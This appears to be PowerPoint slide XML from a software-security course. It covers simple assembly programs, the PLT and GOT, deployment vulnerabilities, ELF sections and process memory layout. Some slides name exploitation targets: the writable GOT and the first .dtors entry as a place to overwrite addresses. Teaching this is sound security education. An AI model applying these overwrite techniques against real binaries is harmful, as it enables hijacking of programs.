            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>, 13                  ; string length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	80h                      ; interrupt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1                   ; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>sys_exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> function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0                   ; return code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>	80h                      ; interrupt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9329619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(64-bit)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Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>bits 64</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>section .data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t> "Hello world!",0Ah</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>section .text</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>global _start</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>_start:</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rax,1			; write </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>syscall</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rdi,1			; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>stdout</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rsi,str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>		; string address</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rdx,13	       	; string length</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>syscall</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rax,60			; exit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>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rdi,0			; status</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>syscall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack Bold"/>
              <a:cs typeface="Hack Bold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="800524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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>PLT and GOT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048579" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>When a shared library function is called by a program the address called is an entry in the Procedure Linkage Table (PLT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The address contains an indirect jump to the addresses contained in variables stored in the Global Offsets Table (GOT)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The first time a function is called, the GOT address is a jump to code that invokes the linker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The linker does its magic and updates the GOT entry, so next time the function is called it can be directly invoked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Note that the PLT is read-only, but the GOT is not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Note: The GOT can be made read-only using the RELRO hardening compilation option</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="296669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Vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>These vulnerabilities are introduced by an incorrect/faulty deployment/configuration of the application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed with more privileges than it should (see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>movemail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in ”The Cuckoo’s Egg” book)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is installed on a system that has a faulty security policy and/or mechanism (e.g., a file that should be read-only is actually writeable)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An application is configured with easy-to-guess default credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If correctly deployed, the application would be (more) secure </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41801699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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>The .dtors Section</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049603" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ELF format includes a number of sections with special meaning </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ctors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sections contain code to be executed before the actual program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sections contain code to be executed after the actual program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dtors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> section is not read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The section is a list of four-byte addresses (starts with 0xffffffff and ends with 0x00000000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The first address after the 0xffffffff is a good target for address overwriting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27522246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Loading and Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a program is invoked, the operating system creates a process to execute the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The binary file is parsed and parts are copied into memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Linux, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/proc/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;/maps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> shows the memory layout of a process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relocation of objects and reference resolution is performed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The instruction pointer is set to the location specified as the start address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Execution begins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2594514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Memory Layout</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554512" y="2518370"/>
            <a:ext cx="2331843" cy="2146091"/>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3GB Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1554512" y="1708107"/>
            <a:ext cx="2331843" cy="8102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1GB Kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137235" y="3798448"/>
            <a:ext cx="2331843" cy="866010"/>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128TB Program</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4137235" y="1708104"/>
            <a:ext cx="2331843" cy="8102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128TB Kernel +</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other areas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2444747" y="1216862"/>
            <a:ext cx="552781" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>x86</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4033734" y="1216862"/>
            <a:ext cx="2792013" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>x86_64 (48-bit addresses)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="106241" y="4392200"/>
            <a:ext cx="1419980" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0x00000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="131516" y="1694790"/>
            <a:ext cx="1419980" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0xffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="110292" y="2518370"/>
            <a:ext cx="1419980" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0xbfffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115258" y="2203785"/>
            <a:ext cx="1419980" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0xc0000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6415298" y="4357882"/>
            <a:ext cx="2408231" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0x0000000000000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6469078" y="3687965"/>
            <a:ext cx="2408231" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0x00007fffffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480984" y="2189894"/>
            <a:ext cx="2408231" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0xffff800000000000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6459086" y="1642419"/>
            <a:ext cx="2408231" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Hack Bold"/>
                <a:cs typeface="Hack Bold"/>
              </a:rPr>
              <a:t>0xffffffffffffffff</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37274452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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Process Structure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="985091" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Environment/Argument section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used for environment data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used for the command line data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Stack section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Used for local parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
